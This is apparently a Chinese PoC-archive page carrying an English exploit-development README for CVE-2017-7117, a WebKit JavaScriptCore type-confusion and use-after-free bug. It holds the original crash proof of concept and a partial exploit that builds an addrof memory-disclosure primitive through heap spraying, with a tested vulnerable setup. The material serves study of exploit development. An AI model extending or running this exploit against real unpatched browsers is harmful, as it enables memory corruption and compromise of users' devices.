关联漏洞
标题:
多款Apple产品WebKit 安全漏洞
(CVE-2017-7117)
描述:Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是为移动设备所开发的一套操作系统;Safari是一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器。WebKit是KDE、苹果(Apple)、谷歌(Google)等公司共同开发的一套开源Web浏览器引擎,目前被Apple Safari及Google Chrome等浏览器使用。 多款Apple产品中的WebKit组件存在安全漏洞。远程攻击者可借助恶意制作的Web内容利用该漏洞执行任意代码(内存损坏)。以下产品和版本
介绍
# cve-2017-7117
## About the Bug
A type-confusion and UAF found in iOS 10.3.4 and earlier, Safari before 11.0.
CVE-2017-7117: [mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7117)
## Original Proof of Concept
Discovered by @lokihardt, source: [Google Project Zero](https://project-zero.issues.chromium.org/issues/42450350)
```js
function f() {
let o = {};
for (let i in {xx: 0}) { // i is a String
for (i of [0]) { // i is now a number, but JIT treats as String
}
print(o[i]); // whoops
}
}
f();
```
Running the code above will cause JSC to crash.
## The Exploit
We craft a large array `arr`, that the JIT compiler will become confused into beleiving is a string.
```js
var arr = new Uint32Array(1 * 1024 * 1024 / 4); // 1mb | 1 item == 4 bytes
arr[4] = 0xb0; // to pass checks for the member m_hashAndFlags
```
When the reference to `i` is lost, we maintain access to the original array `arr` and can read the underlying memory.
By spraying a known value we can find this and traveerse up to locate the pointer to any object.
```js
function addrof(obj) {
// search the freed array for this number
var locator = 0x1337;
// spray the freed memory with the locator
var sprays = [];
for (var i = 0; i < 0x1000; ++i) {
sprays.push(i % 2 == 0 ? locator : obj);
}
// find the first instance of the locator
var found = null;
for(var i = 0; i < arr.length; i++) {
if(arr[i] == locator) {
found = i
break
}
}
// the pointer for the object is 3 and 2 indicies after the locator
return found && [arr[found + 3], arr[found + 2]]
}
```
Values are accessed in memory via a `Uint32Array`, lower bits first, upper bits second.
```js
let target = {
foo: "bar"
}
let address = addrof(target)
// address: 0x0000ffff8d178e60
```
You can verify the address is valid using `describe()`
```js
print(describe(target))
// Object: 0xffff8d178e60 with butterfly (nil) (0xffff9099bba0:[Object, {foo:0}, NonArray, Proto:0xffff909b00a0, Leaf]), ID: 244
```
## Replicate the Setup
Currently tested on:
- Ubuntu 20.04.5 LTS ARM64
- Vulnerable JavaScriptCore (JSC) from libwebkitgtk version 2.16.0
- Build archive: [launchpad.net](https://launchpad.net/ubuntu/+source/webkit2gtk/2.16.0-1)
- LLDB for memory inspection (optional)
Does not work (yet) on iPhone 5, iOS 10.3.4. Let's find out why ...
## Next Steps?
- Craft a fake object
- Read / write arbitrary memory
- Jailbreak iOS 10?
## Important
This repository is provided as an educational resource to track my learning in exploit development. This CVE has been patched for more than 7 years. Do NOT use this for nefarious purposes, obviously.
文件快照
[4.0K] /data/pocs/2d5cfb8e1e7420af40fa989b6618d4f0663645d2
├── [1.0K] LICENSE
├── [1.4K] poc.js
└── [2.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。